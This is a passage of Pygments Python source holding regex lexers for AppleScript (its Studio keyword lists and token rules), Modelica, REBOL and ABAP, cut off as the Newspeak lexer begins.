view item', 'should selection change', 
'should zoom', 'shown', 'update menu item', 'update parameters', 'update toolbar item', 'was hidden', 'was miniaturized', 'will become active', 'will close', 'will dismiss', 'will display browser cell', 'will display cell', 'will display item cell', 'will display outline cell', 'will finish launching', 'will hide', 'will miniaturize', 'will move', 'will open', 'will pop up', 'will quit', 'will resign active', 'will resize( sub views)?', 'will select tab view item', 'will show', 'will zoom', 'write to file', 'zoomed'] StudioCommands = ['animate', 'append', 'call method', 'center', 'close drawer', 'close panel', 'display', 'display alert', 'display dialog', 'display panel', 'go', 'hide', 'highlight', 'increment', 'item for', 'load image', 'load movie', 'load nib', 'load panel', 'load sound', 'localized string', 'lock focus', 'log', 'open drawer', 'path for', 'pause', 'perform action', 'play', 'register', 'resume', 'scroll', 'select( all)?', 'show', 'size to fit', 'start', 'step back', 'step forward', 'stop', 'synchronize', 'unlock focus', 'update'] StudioProperties = ['accepts arrow key', 'action method', 'active', 'alignment', 'allowed identifiers', 'allows branch selection', 'allows column reordering', 'allows column resizing', 'allows column selection', 'allows customization', 'allows editing text attributes', 'allows empty selection', 'allows mixed state', 'allows multiple selection', 'allows reordering', 'allows undo', 'alpha( value)?', 'alternate image', 'alternate increment value', 'alternate title', 'animation delay', 'associated file name', 'associated object', 'auto completes', 'auto display', 'auto enables items', 'auto repeat', 'auto resizes( outline column)?', 'auto save expanded items', 'auto save name', 'auto save table columns', 'auto saves configuration', 'auto scroll', 'auto sizes all columns to fit', 'auto sizes cells', 'background color', 'bezel state', 'bezel style', 'bezeled', 'border rect', 'border type', 'bordered', 'bounds( rotation)?', 'box 
type', 'button returned', 'button type', 'can choose directories', 'can choose files', 'can draw', 'can hide', 'cell( (background color|size|type))?', 'characters', 'class', 'click count', 'clicked( data)? column', 'clicked data item', 'clicked( data)? row', 'closeable', 'collating', 'color( (mode|panel))', 'command key down', 'configuration', 'content(s| (size|view( margins)?))?', 'context', 'continuous', 'control key down', 'control size', 'control tint', 'control view', 'controller visible', 'coordinate system', 'copies( on scroll)?', 'corner view', 'current cell', 'current column', 'current( field)? editor', 'current( menu)? item', 'current row', 'current tab view item', 'data source', 'default identifiers', 'delta (x|y|z)', 'destination window', 'directory', 'display mode', 'displayed cell', 'document( (edited|rect|view))?', 'double value', 'dragged column', 'dragged distance', 'dragged items', 'draws( cell)? background', 'draws grid', 'dynamically scrolls', 'echos bullets', 'edge', 'editable', 'edited( data)? column', 'edited data item', 'edited( data)? 
row', 'enabled', 'enclosing scroll view', 'ending page', 'error handling', 'event number', 'event type', 'excluded from windows menu', 'executable path', 'expanded', 'fax number', 'field editor', 'file kind', 'file name', 'file type', 'first responder', 'first visible column', 'flipped', 'floating', 'font( panel)?', 'formatter', 'frameworks path', 'frontmost', 'gave up', 'grid color', 'has data items', 'has horizontal ruler', 'has horizontal scroller', 'has parent data item', 'has resize indicator', 'has shadow', 'has sub menu', 'has vertical ruler', 'has vertical scroller', 'header cell', 'header view', 'hidden', 'hides when deactivated', 'highlights by', 'horizontal line scroll', 'horizontal page scroll', 'horizontal ruler view', 'horizontally resizable', 'icon image', 'id', 'identifier', 'ignores multiple clicks', 'image( (alignment|dims when disabled|frame style|' 'scaling))?', 'imports graphics', 'increment value', 'indentation per level', 'indeterminate', 'index', 'integer value', 'intercell spacing', 'item height', 'key( (code|equivalent( modifier)?|window))?', 'knob thickness', 'label', 'last( visible)? column', 'leading offset', 'leaf', 'level', 'line scroll', 'loaded', 'localized sort', 'location', 'loop mode', 'main( (bunde|menu|window))?', 'marker follows cell', 'matrix mode', 'maximum( content)? size', 'maximum visible columns', 'menu( form representation)?', 'miniaturizable', 'miniaturized', 'minimized image', 'minimized title', 'minimum column width', 'minimum( content)? 
size', 'modal', 'modified', 'mouse down state', 'movie( (controller|file|rect))?', 'muted', 'name', 'needs display', 'next state', 'next text', 'number of tick marks', 'only tick mark values', 'opaque', 'open panel', 'option key down', 'outline table column', 'page scroll', 'pages across', 'pages down', 'palette label', 'pane splitter', 'parent data item', 'parent window', 'pasteboard', 'path( (names|separator))?', 'playing', 'plays every frame', 'plays selection only', 'position', 'preferred edge', 'preferred type', 'pressure', 'previous text', 'prompt', 'properties', 'prototype cell', 'pulls down', 'rate', 'released when closed', 'repeated', 'requested print time', 'required file type', 'resizable', 'resized column', 'resource path', 'returns records', 'reuses columns', 'rich text', 'roll over', 'row height', 'rulers visible', 'save panel', 'scripts path', 'scrollable', 'selectable( identifiers)?', 'selected cell', 'selected( data)? columns?', 'selected data items?', 'selected( data)? 
rows?', 'selected item identifier', 'selection by rect', 'send action on arrow key', 'sends action when done editing', 'separates columns', 'separator item', 'sequence number', 'services menu', 'shared frameworks path', 'shared support path', 'sheet', 'shift key down', 'shows alpha', 'shows state by', 'size( mode)?', 'smart insert delete enabled', 'sort case sensitivity', 'sort column', 'sort order', 'sort type', 'sorted( data rows)?', 'sound', 'source( mask)?', 'spell checking enabled', 'starting page', 'state', 'string value', 'sub menu', 'super menu', 'super view', 'tab key traverses cells', 'tab state', 'tab type', 'tab view', 'table view', 'tag', 'target( printer)?', 'text color', 'text container insert', 'text container origin', 'text returned', 'tick mark position', 'time stamp', 'title(d| (cell|font|height|position|rect))?', 'tool tip', 'toolbar', 'trailing offset', 'transparent', 'treat packages as directories', 'truncated labels', 'types', 'unmodified characters', 'update views', 'use sort indicator', 'user defaults', 'uses data source', 'uses ruler', 'uses threaded animation', 'uses title from previous column', 'value wraps', 'version', 'vertical( (line scroll|page scroll|ruler view))?', 'vertically resizable', 'view', 'visible( document rect)?', 'volume', 'width', 'window', 'windows menu', 'wraps', 'zoomable', 'zoomed'] tokens = { 'root': [ (r'\s+', Text), (r'¬\n', String.Escape), (r"'s\s+", Text), # This is a possessive, consider moving (r'(--|#).*?$', Comment), (r'\(\*', Comment.Multiline, 'comment'), (r'[\(\){}!,.:]', Punctuation), (r'(«)([^»]+)(»)', bygroups(Text, Name.Builtin, Text)), (r'\b((?:considering|ignoring)\s*)' r'(application responses|case|diacriticals|hyphens|' r'numeric strings|punctuation|white space)', bygroups(Keyword, Name.Builtin)), (r'(-|\*|\+|&|≠|>=?|<=?|=|≥|≤|/|÷|\^)', Operator), (r"\b(%s)\b" % '|'.join(Operators), Operator.Word), (r'^(\s*(?:on|end)\s+)' r'(%s)' % '|'.join(StudioEvents[::-1]), bygroups(Keyword, Name.Function)), 
(r'^(\s*)(in|on|script|to)(\s+)', bygroups(Text, Keyword, Text)),
            # Long alternation tables built from the word lists defined above.
            # RegexLexer tries rules top to bottom, so order matters here.
            (r'\b(as )(%s)\b' % '|'.join(Classes), bygroups(Keyword, Name.Class)),
            (r'\b(%s)\b' % '|'.join(Literals), Name.Constant),
            (r'\b(%s)\b' % '|'.join(Commands), Name.Builtin),
            (r'\b(%s)\b' % '|'.join(Control), Keyword),
            (r'\b(%s)\b' % '|'.join(Declarations), Keyword),
            (r'\b(%s)\b' % '|'.join(Reserved), Name.Builtin),
            (r'\b(%s)s?\b' % '|'.join(BuiltIn), Name.Builtin),
            (r'\b(%s)\b' % '|'.join(HandlerParams), Name.Builtin),
            (r'\b(%s)\b' % '|'.join(StudioProperties), Name.Attribute),
            (r'\b(%s)s?\b' % '|'.join(StudioClasses), Name.Builtin),
            (r'\b(%s)\b' % '|'.join(StudioCommands), Name.Builtin),
            (r'\b(%s)\b' % '|'.join(References), Name.Builtin),
            (r'"(\\\\|\\"|[^"])*"', String.Double),
            (r'\b(%s)\b' % Identifiers, Name.Variable),
            (r'[-+]?(\d+\.\d*|\d*\.\d+)(E[-+][0-9]+)?', Number.Float),
            (r'[-+]?\d+', Number.Integer),
        ],
        'comment': [
            # AppleScript (* ... *) block comments nest, hence #push/#pop.
            ('\(\*', Comment.Multiline, '#push'),
            ('\*\)', Comment.Multiline, '#pop'),
            ('[^*(]+', Comment.Multiline),
            ('[*(]', Comment.Multiline),
        ],
    }


class ModelicaLexer(RegexLexer):
    """
    For `Modelica <http://www.modelica.org/>`_ source code.

    *New in Pygments 1.1.*
    """
    name = 'Modelica'
    aliases = ['modelica']
    filenames = ['*.mo']
    mimetypes = ['text/x-modelica']

    flags = re.IGNORECASE | re.DOTALL

    tokens = {
        'whitespace': [
            (r'\n', Text),
            (r'\s+', Text),
            (r'\\\n', Text),  # line continuation
            (r'//(\n|(.|\n)*?[^\\]\n)', Comment),
            (r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment),
        ],
        'statements': [
            (r'"', String, 'string'),
            (r'(\d+\.\d*|\.\d+|\d+|\d.)[eE][+-]?\d+[lL]?', Number.Float),
            (r'(\d+\.\d*|\.\d+)', Number.Float),
            (r'\d+[Ll]?', Number.Integer),
            (r'[~!%^&*+=|?:<>/-]', Operator),
            (r'[()\[\]{},.;]', Punctuation),
            (r'(true|false|NULL|Real|Integer|Boolean)\b', Name.Builtin),
            # Dotted component references (possibly quoted identifiers).
            (r"([a-zA-Z_][\w]*|'[a-zA-Z_\+\-\*\/\^][\w]*')"
             r"(\.([a-zA-Z_][\w]*|'[a-zA-Z_\+\-\*\/\^][\w]*'))+", Name.Class),
            (r"('[\w\+\-\*\/\^]+'|\w+)", Name),
        ],
        'root': [
            # keywords/functions/operators/classes are tried before plain
            # statements so identifiers do not shadow them.
            include('whitespace'),
            include('keywords'),
            include('functions'),
            include('operators'),
            include('classes'),
            (r'("<html>|<html>)', Name.Tag, 'html-content'),
            include('statements'),
        ],
        'keywords': [
            (r'(algorithm|annotation|break|connect|constant|constrainedby|'
             r'discrete|each|else|elseif|elsewhen|encapsulated|enumeration|'
             r'end|equation|exit|expandable|extends|'
             r'external|false|final|flow|for|if|import|impure|in|initial\sequation|'
             r'inner|input|loop|nondiscrete|outer|output|parameter|partial|'
             r'protected|public|pure|redeclare|replaceable|stream|time|then|true|'
             r'when|while|within)\b', Keyword),
        ],
        'functions': [
            (r'(abs|acos|acosh|asin|asinh|atan|atan2|atan3|ceil|cos|cosh|'
             r'cross|div|exp|floor|getInstanceName|log|log10|mod|rem|'
             r'semiLinear|sign|sin|sinh|size|spatialDistribution|sqrt|tan|'
             r'tanh|zeros)\b', Name.Function),
        ],
        'operators': [
            (r'(actualStream|and|assert|cardinality|change|Clock|delay|der|edge|'
             r'hold|homotopy|initial|inStream|noEvent|not|or|pre|previous|reinit|'
             r'return|sample|smooth|spatialDistribution|subSample|terminal|'
             r'terminate)\b', Name.Builtin),
        ],
        'classes': [
            (r'(block|class|connector|function|model|package|'
             r'record|type)(\s+)([A-Za-z_]+)',
bygroups(Keyword, Text, Name.Class)) ], 'string': [ (r'"', String, '#pop'), (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), (r'[^\\"\n]+', String), # all other characters (r'\\\n', String), # line continuation (r'\\', String), # stray backslash ], 'html-content': [ (r'<\s*/\s*html\s*>', Name.Tag, '#pop'), (r'.+?(?=<\s*/\s*html\s*>)', using(HtmlLexer)), ] } class RebolLexer(RegexLexer): """ A `REBOL <http://www.rebol.com/>`_ lexer. *New in Pygments 1.1.* """ name = 'REBOL' aliases = ['rebol'] filenames = ['*.r', '*.r3'] mimetypes = ['text/x-rebol'] flags = re.IGNORECASE | re.MULTILINE re.IGNORECASE escape_re = r'(?:\^\([0-9a-fA-F]{1,4}\)*)' def word_callback(lexer, match): word = match.group() if re.match(".*:$", word): yield match.start(), Generic.Subheading, word elif re.match( r'(native|alias|all|any|as-string|as-binary|bind|bound\?|case|' r'catch|checksum|comment|debase|dehex|exclude|difference|disarm|' r'either|else|enbase|foreach|remove-each|form|free|get|get-env|if|' r'in|intersect|loop|minimum-of|maximum-of|mold|new-line|' r'new-line\?|not|now|prin|print|reduce|compose|construct|repeat|' r'reverse|save|script\?|set|shift|switch|throw|to-hex|trace|try|' r'type\?|union|unique|unless|unprotect|unset|until|use|value\?|' r'while|compress|decompress|secure|open|close|read|read-io|' r'write-io|write|update|query|wait|input\?|exp|log-10|log-2|' r'log-e|square-root|cosine|sine|tangent|arccosine|arcsine|' r'arctangent|protect|lowercase|uppercase|entab|detab|connected\?|' r'browse|launch|stats|get-modes|set-modes|to-local-file|' r'to-rebol-file|encloak|decloak|create-link|do-browser|bind\?|' r'hide|draw|show|size-text|textinfo|offset-to-caret|' r'caret-to-offset|local-request-file|rgb-to-hsv|hsv-to-rgb|' r'crypt-strength\?|dh-make-key|dh-generate-key|dh-compute-key|' r'dsa-make-key|dsa-generate-key|dsa-make-signature|' r'dsa-verify-signature|rsa-make-key|rsa-generate-key|' r'rsa-encrypt)$', word): yield match.start(), Name.Builtin, word elif 
re.match( r'(add|subtract|multiply|divide|remainder|power|and~|or~|xor~|' r'minimum|maximum|negate|complement|absolute|random|head|tail|' r'next|back|skip|at|pick|first|second|third|fourth|fifth|sixth|' r'seventh|eighth|ninth|tenth|last|path|find|select|make|to|copy\*|' r'insert|remove|change|poke|clear|trim|sort|min|max|abs|cp|' r'copy)$', word): yield match.start(), Name.Function, word elif re.match( r'(error|source|input|license|help|install|echo|Usage|with|func|' r'throw-on-error|function|does|has|context|probe|\?\?|as-pair|' r'mod|modulo|round|repend|about|set-net|append|join|rejoin|reform|' r'remold|charset|array|replace|move|extract|forskip|forall|alter|' r'first+|also|take|for|forever|dispatch|attempt|what-dir|' r'change-dir|clean-path|list-dir|dirize|rename|split-path|delete|' r'make-dir|delete-dir|in-dir|confirm|dump-obj|upgrade|what|' r'build-tag|process-source|build-markup|decode-cgi|read-cgi|' r'write-user|save-user|set-user-name|protect-system|parse-xml|' r'cvs-date|cvs-version|do-boot|get-net-info|desktop|layout|' r'scroll-para|get-face|alert|set-face|uninstall|unfocus|' r'request-dir|center-face|do-events|net-error|decode-url|' r'parse-header|parse-header-date|parse-email-addrs|import-email|' r'send|build-attach-body|resend|show-popup|hide-popup|open-events|' r'find-key-face|do-face|viewtop|confine|find-window|' r'insert-event-func|remove-event-func|inform|dump-pane|dump-face|' r'flag-face|deflag-face|clear-fields|read-net|vbug|path-thru|' r'read-thru|load-thru|do-thru|launch-thru|load-image|' r'request-download|do-face-alt|set-font|set-para|get-style|' r'set-style|make-face|stylize|choose|hilight-text|hilight-all|' r'unlight-text|focus|scroll-drag|clear-face|reset-face|scroll-face|' r'resize-face|load-stock|load-stock-block|notify|request|flash|' r'request-color|request-pass|request-text|request-list|' r'request-date|request-file|dbug|editor|link-relative-path|' r'emailer|parse-error)$', word): yield match.start(), Keyword.Namespace, word elif 
re.match( r'(halt|quit|do|load|q|recycle|call|run|ask|parse|view|unview|' r'return|exit|break)$', word): yield match.start(), Name.Exception, word elif re.match('REBOL$', word): yield match.start(), Generic.Heading, word elif re.match("to-.*", word): yield match.start(), Keyword, word elif re.match('(\+|-|\*|/|//|\*\*|and|or|xor|=\?|=|==|<>|<|>|<=|>=)$', word): yield match.start(), Operator, word elif re.match(".*\?$", word): yield match.start(), Keyword, word elif re.match(".*\!$", word): yield match.start(), Keyword.Type, word elif re.match("'.*", word): yield match.start(), Name.Variable.Instance, word # lit-word elif re.match("#.*", word): yield match.start(), Name.Label, word # issue elif re.match("%.*", word): yield match.start(), Name.Decorator, word # file else: yield match.start(), Name.Variable, word tokens = { 'root': [ (r'REBOL', Generic.Strong, 'script'), (r'R', Comment), (r'[^R]+', Comment), ], 'script': [ (r'\s+', Text), (r'#"', String.Char, 'char'), (r'#{[0-9a-fA-F]*}', Number.Hex), (r'2#{', Number.Hex, 'bin2'), (r'64#{[0-9a-zA-Z+/=\s]*}', Number.Hex), (r'"', String, 'string'), (r'{', String, 'string2'), (r';#+.*\n', Comment.Special), (r';\*+.*\n', Comment.Preproc), (r';.*\n', Comment), (r'%"', Name.Decorator, 'stringFile'), (r'%[^(\^{^")\s\[\]]+', Name.Decorator), (r'[+-]?([a-zA-Z]{1,3})?\$\d+(\.\d+)?', Number.Float), # money (r'[+-]?\d+\:\d+(\:\d+)?(\.\d+)?', String.Other), # time (r'\d+\-[0-9a-zA-Z]+\-\d+(\/\d+\:\d+(\:\d+)?' 
r'([\.\d+]?([+-]?\d+:\d+)?)?)?', String.Other), # date (r'\d+(\.\d+)+\.\d+', Keyword.Constant), # tuple (r'\d+[xX]\d+', Keyword.Constant), # pair (r'[+-]?\d+(\'\d+)?([\.,]\d*)?[eE][+-]?\d+', Number.Float), (r'[+-]?\d+(\'\d+)?[\.,]\d*', Number.Float), (r'[+-]?\d+(\'\d+)?', Number), (r'[\[\]\(\)]', Generic.Strong), (r'[a-zA-Z]+[^(\^{"\s:)]*://[^(\^{"\s)]*', Name.Decorator), # url (r'mailto:[^(\^{"@\s)]+@[^(\^{"@\s)]+', Name.Decorator), # url (r'[^(\^{"@\s)]+@[^(\^{"@\s)]+', Name.Decorator), # email (r'comment\s', Comment, 'comment'), (r'/[^(\^{^")\s/[\]]*', Name.Attribute), (r'([^(\^{^")\s/[\]]+)(?=[:({"\s/\[\]])', word_callback), (r'<[a-zA-Z0-9:._-]*>', Name.Tag), (r'<[^(<>\s")]+', Name.Tag, 'tag'), (r'([^(\^{^")\s]+)', Text), ], 'string': [ (r'[^(\^")]+', String), (escape_re, String.Escape), (r'[\(|\)]+', String), (r'\^.', String.Escape), (r'"', String, '#pop'), ], 'string2': [ (r'[^(\^{^})]+', String), (escape_re, String.Escape), (r'[\(|\)]+', String), (r'\^.', String.Escape), (r'{', String, '#push'), (r'}', String, '#pop'), ], 'stringFile': [ (r'[^(\^")]+', Name.Decorator), (escape_re, Name.Decorator), (r'\^.', Name.Decorator), (r'"', Name.Decorator, '#pop'), ], 'char': [ (escape_re + '"', String.Char, '#pop'), (r'\^."', String.Char, '#pop'), (r'."', String.Char, '#pop'), ], 'tag': [ (escape_re, Name.Tag), (r'"', Name.Tag, 'tagString'), (r'[^(<>\r\n")]+', Name.Tag), (r'>', Name.Tag, '#pop'), ], 'tagString': [ (r'[^(\^")]+', Name.Tag), (escape_re, Name.Tag), (r'[\(|\)]+', Name.Tag), (r'\^.', Name.Tag), (r'"', Name.Tag, '#pop'), ], 'tuple': [ (r'(\d+\.)+', Keyword.Constant), (r'\d+', Keyword.Constant, '#pop'), ], 'bin2': [ (r'\s+', Number.Hex), (r'([0-1]\s*){8}', Number.Hex), (r'}', Number.Hex, '#pop'), ], 'comment': [ (r'"', Comment, 'commentString1'), (r'{', Comment, 'commentString2'), (r'\[', Comment, 'commentBlock'), (r'[^(\s{\"\[]+', Comment, '#pop'), ], 'commentString1': [ (r'[^(\^")]+', Comment), (escape_re, Comment), (r'[\(|\)]+', Comment), (r'\^.', 
Comment), (r'"', Comment, '#pop'), ], 'commentString2': [ (r'[^(\^{^})]+', Comment), (escape_re, Comment), (r'[\(|\)]+', Comment), (r'\^.', Comment), (r'{', Comment, '#push'), (r'}', Comment, '#pop'), ], 'commentBlock': [ (r'\[', Comment, '#push'), (r'\]', Comment, '#pop'), (r'[^(\[\])]+', Comment), ], } class ABAPLexer(RegexLexer): """ Lexer for ABAP, SAP's integrated language. *New in Pygments 1.1.* """ name = 'ABAP' aliases = ['abap'] filenames = ['*.abap'] mimetypes = ['text/x-abap'] flags = re.IGNORECASE | re.MULTILINE tokens = { 'common': [ (r'\s+', Text), (r'^\*.*$', Comment.Single), (r'\".*?\n', Comment.Single), ], 'variable-names': [ (r'<[\S_]+>', Name.Variable), (r'\w[\w~]*(?:(\[\])|->\*)?', Name.Variable), ], 'root': [ include('common'), #function calls (r'(CALL\s+(?:BADI|CUSTOMER-FUNCTION|FUNCTION))(\s+)(\'?\S+\'?)', bygroups(Keyword, Text, Name.Function)), (r'(CALL\s+(?:DIALOG|SCREEN|SUBSCREEN|SELECTION-SCREEN|' r'TRANSACTION|TRANSFORMATION))\b', Keyword), (r'(FORM|PERFORM)(\s+)(\w+)', bygroups(Keyword, Text, Name.Function)), (r'(PERFORM)(\s+)(\()(\w+)(\))', bygroups(Keyword, Text, Punctuation, Name.Variable, Punctuation )), (r'(MODULE)(\s+)(\S+)(\s+)(INPUT|OUTPUT)', bygroups(Keyword, Text, Name.Function, Text, Keyword)), # method implementation (r'(METHOD)(\s+)([\w~]+)', bygroups(Keyword, Text, Name.Function)), # method calls (r'(\s+)([\w\-]+)([=\-]>)([\w\-~]+)', bygroups(Text, Name.Variable, Operator, Name.Function)), # call methodnames returning style (r'(?<=(=|-)>)([\w\-~]+)(?=\()', Name.Function), # keywords with dashes in them. # these need to be first, because for instance the -ID part # of MESSAGE-ID wouldn't get highlighted if MESSAGE was # first in the list of keywords. 
(r'(ADD-CORRESPONDING|AUTHORITY-CHECK|'
             r'CLASS-DATA|CLASS-EVENTS|CLASS-METHODS|CLASS-POOL|'
             r'DELETE-ADJACENT|DIVIDE-CORRESPONDING|'
             r'EDITOR-CALL|ENHANCEMENT-POINT|ENHANCEMENT-SECTION|EXIT-COMMAND|'
             r'FIELD-GROUPS|FIELD-SYMBOLS|FUNCTION-POOL|'
             r'INTERFACE-POOL|INVERTED-DATE|'
             r'LOAD-OF-PROGRAM|LOG-POINT|'
             r'MESSAGE-ID|MOVE-CORRESPONDING|MULTIPLY-CORRESPONDING|'
             r'NEW-LINE|NEW-PAGE|NEW-SECTION|NO-EXTENSION|'
             r'OUTPUT-LENGTH|PRINT-CONTROL|'
             r'SELECT-OPTIONS|START-OF-SELECTION|SUBTRACT-CORRESPONDING|'
             r'SYNTAX-CHECK|SYSTEM-EXCEPTIONS|'
             r'TYPE-POOL|TYPE-POOLS'
             r')\b', Keyword),

            # keyword kombinations
            # (multi-word statements; longest phrases first so their prefixes
            # do not match as single-word keywords below)
            (r'CREATE\s+(PUBLIC|PRIVATE|DATA|OBJECT)|'
             r'((PUBLIC|PRIVATE|PROTECTED)\s+SECTION|'
             r'(TYPE|LIKE)(\s+(LINE\s+OF|REF\s+TO|'
             r'(SORTED|STANDARD|HASHED)\s+TABLE\s+OF))?|'
             r'FROM\s+(DATABASE|MEMORY)|CALL\s+METHOD|'
             r'(GROUP|ORDER) BY|HAVING|SEPARATED BY|'
             r'GET\s+(BADI|BIT|CURSOR|DATASET|LOCALE|PARAMETER|'
             r'PF-STATUS|(PROPERTY|REFERENCE)\s+OF|'
             r'RUN\s+TIME|TIME\s+(STAMP)?)?|'
             r'SET\s+(BIT|BLANK\s+LINES|COUNTRY|CURSOR|DATASET|EXTENDED\s+CHECK|'
             r'HANDLER|HOLD\s+DATA|LANGUAGE|LEFT\s+SCROLL-BOUNDARY|'
             r'LOCALE|MARGIN|PARAMETER|PF-STATUS|PROPERTY\s+OF|'
             r'RUN\s+TIME\s+(ANALYZER|CLOCK\s+RESOLUTION)|SCREEN|'
             r'TITLEBAR|UPADTE\s+TASK\s+LOCAL|USER-COMMAND)|'
             r'CONVERT\s+((INVERTED-)?DATE|TIME|TIME\s+STAMP|TEXT)|'
             r'(CLOSE|OPEN)\s+(DATASET|CURSOR)|'
             r'(TO|FROM)\s+(DATA BUFFER|INTERNAL TABLE|MEMORY ID|'
             r'DATABASE|SHARED\s+(MEMORY|BUFFER))|'
             r'DESCRIBE\s+(DISTANCE\s+BETWEEN|FIELD|LIST|TABLE)|'
             r'FREE\s(MEMORY|OBJECT)?|'
             r'PROCESS\s+(BEFORE\s+OUTPUT|AFTER\s+INPUT|'
             r'ON\s+(VALUE-REQUEST|HELP-REQUEST))|'
             r'AT\s+(LINE-SELECTION|USER-COMMAND|END\s+OF|NEW)|'
             r'AT\s+SELECTION-SCREEN(\s+(ON(\s+(BLOCK|(HELP|VALUE)-REQUEST\s+FOR|'
             r'END\s+OF|RADIOBUTTON\s+GROUP))?|OUTPUT))?|'
             r'SELECTION-SCREEN:?\s+((BEGIN|END)\s+OF\s+((TABBED\s+)?BLOCK|LINE|'
             r'SCREEN)|COMMENT|FUNCTION\s+KEY|'
             r'INCLUDE\s+BLOCKS|POSITION|PUSHBUTTON|'
             r'SKIP|ULINE)|'
             r'LEAVE\s+(LIST-PROCESSING|PROGRAM|SCREEN|'
             r'TO LIST-PROCESSING|TO TRANSACTION)'
             r'(ENDING|STARTING)\s+AT|'
             r'FORMAT\s+(COLOR|INTENSIFIED|INVERSE|HOTSPOT|INPUT|FRAMES|RESET)|'
             r'AS\s+(CHECKBOX|SUBSCREEN|WINDOW)|'
             r'WITH\s+(((NON-)?UNIQUE)?\s+KEY|FRAME)|'
             r'(BEGIN|END)\s+OF|'
             r'DELETE(\s+ADJACENT\s+DUPLICATES\sFROM)?|'
             r'COMPARING(\s+ALL\s+FIELDS)?|'
             r'INSERT(\s+INITIAL\s+LINE\s+INTO|\s+LINES\s+OF)?|'
             r'IN\s+((BYTE|CHARACTER)\s+MODE|PROGRAM)|'
             r'END-OF-(DEFINITION|PAGE|SELECTION)|'
             r'WITH\s+FRAME(\s+TITLE)|'
             # simple kombinations
             r'AND\s+(MARK|RETURN)|CLIENT\s+SPECIFIED|CORRESPONDING\s+FIELDS\s+OF|'
             r'IF\s+FOUND|FOR\s+EVENT|INHERITING\s+FROM|LEAVE\s+TO\s+SCREEN|'
             r'LOOP\s+AT\s+(SCREEN)?|LOWER\s+CASE|MATCHCODE\s+OBJECT|MODIF\s+ID|'
             r'MODIFY\s+SCREEN|NESTING\s+LEVEL|NO\s+INTERVALS|OF\s+STRUCTURE|'
             r'RADIOBUTTON\s+GROUP|RANGE\s+OF|REF\s+TO|SUPPRESS DIALOG|'
             r'TABLE\s+OF|UPPER\s+CASE|TRANSPORTING\s+NO\s+FIELDS|'
             r'VALUE\s+CHECK|VISIBLE\s+LENGTH|HEADER\s+LINE)\b', Keyword),

            # single word keywords.
            (r'(^|(?<=(\s|\.)))(ABBREVIATED|ADD|ALIASES|APPEND|ASSERT|'
             r'ASSIGN(ING)?|AT(\s+FIRST)?|'
             r'BACK|BLOCK|BREAK-POINT|'
             r'CASE|CATCH|CHANGING|CHECK|CLASS|CLEAR|COLLECT|COLOR|COMMIT|'
             r'CREATE|COMMUNICATION|COMPONENTS?|COMPUTE|CONCATENATE|CONDENSE|'
             r'CONSTANTS|CONTEXTS|CONTINUE|CONTROLS|'
             r'DATA|DECIMALS|DEFAULT|DEFINE|DEFINITION|DEFERRED|DEMAND|'
             r'DETAIL|DIRECTORY|DIVIDE|DO|'
             r'ELSE(IF)?|ENDAT|ENDCASE|ENDCLASS|ENDDO|ENDFORM|ENDFUNCTION|'
             r'ENDIF|ENDLOOP|ENDMETHOD|ENDMODULE|ENDSELECT|ENDTRY|'
             r'ENHANCEMENT|EVENTS|EXCEPTIONS|EXIT|EXPORT|EXPORTING|EXTRACT|'
             r'FETCH|FIELDS?|FIND|FOR|FORM|FORMAT|FREE|FROM|'
             r'HIDE|'
             r'ID|IF|IMPORT|IMPLEMENTATION|IMPORTING|IN|INCLUDE|INCLUDING|'
             r'INDEX|INFOTYPES|INITIALIZATION|INTERFACE|INTERFACES|INTO|'
             r'LENGTH|LINES|LOAD|LOCAL|'
             r'JOIN|'
             r'KEY|'
             r'MAXIMUM|MESSAGE|METHOD[S]?|MINIMUM|MODULE|MODIFY|MOVE|MULTIPLY|'
             r'NODES|'
             r'OBLIGATORY|OF|OFF|ON|OVERLAY|'
             r'PACK|PARAMETERS|PERCENTAGE|POSITION|PROGRAM|PROVIDE|PUBLIC|PUT|'
             r'RAISE|RAISING|RANGES|READ|RECEIVE|REFRESH|REJECT|REPORT|RESERVE|'
             r'RESUME|RETRY|RETURN|RETURNING|RIGHT|ROLLBACK|'
             r'SCROLL|SEARCH|SELECT|SHIFT|SINGLE|SKIP|SORT|SPLIT|STATICS|STOP|'
             r'SUBMIT|SUBTRACT|SUM|SUMMARY|SUMMING|SUPPLY|'
             r'TABLE|TABLES|TIMES|TITLE|TO|TOP-OF-PAGE|TRANSFER|TRANSLATE|TRY|TYPES|'
             r'ULINE|UNDER|UNPACK|UPDATE|USING|'
             r'VALUE|VALUES|VIA|'
             r'WAIT|WHEN|WHERE|WHILE|WITH|WINDOW|WRITE)\b', Keyword),

            # builtins
            # (only when immediately followed by an opening parenthesis)
            (r'(abs|acos|asin|atan|'
             r'boolc|boolx|bit_set|'
             r'char_off|charlen|ceil|cmax|cmin|condense|contains|'
             r'contains_any_of|contains_any_not_of|concat_lines_of|cos|cosh|'
             r'count|count_any_of|count_any_not_of|'
             r'dbmaxlen|distance|'
             r'escape|exp|'
             r'find|find_end|find_any_of|find_any_not_of|floor|frac|from_mixed|'
             r'insert|'
             r'lines|log|log10|'
             r'match|matches|'
             r'nmax|nmin|numofchar|'
             r'repeat|replace|rescale|reverse|round|'
             r'segment|shift_left|shift_right|sign|sin|sinh|sqrt|strlen|'
             r'substring|substring_after|substring_from|substring_before|substring_to|'
             r'tan|tanh|to_upper|to_lower|to_mixed|translate|trunc|'
             r'xstrlen)(\()\b', bygroups(Name.Builtin, Punctuation)),

            (r'&[0-9]', Name),
            (r'[0-9]+', Number.Integer),

            # operators which look like variable names before
            # parsing variable names.
            (r'(?<=(\s|.))(AND|EQ|NE|GT|LT|GE|LE|CO|CN|CA|NA|CS|NOT|NS|CP|NP|'
             r'BYTE-CO|BYTE-CN|BYTE-CA|BYTE-NA|BYTE-CS|BYTE-NS|'
             r'IS\s+(NOT\s+)?(INITIAL|ASSIGNED|REQUESTED|BOUND))\b', Operator),

            include('variable-names'),

            # standard oparators after variable names,
            # because < and > are part of field symbols.
            (r'[?*<>=\-+]', Operator),
            (r"'(''|[^'])*'", String.Single),
            (r'[/;:()\[\],\.]', Punctuation)
        ],
    }


class NewspeakLexer(RegexLexer):
    """
    For `Newspeak <http://newspeaklanguage.org/>` syntax.
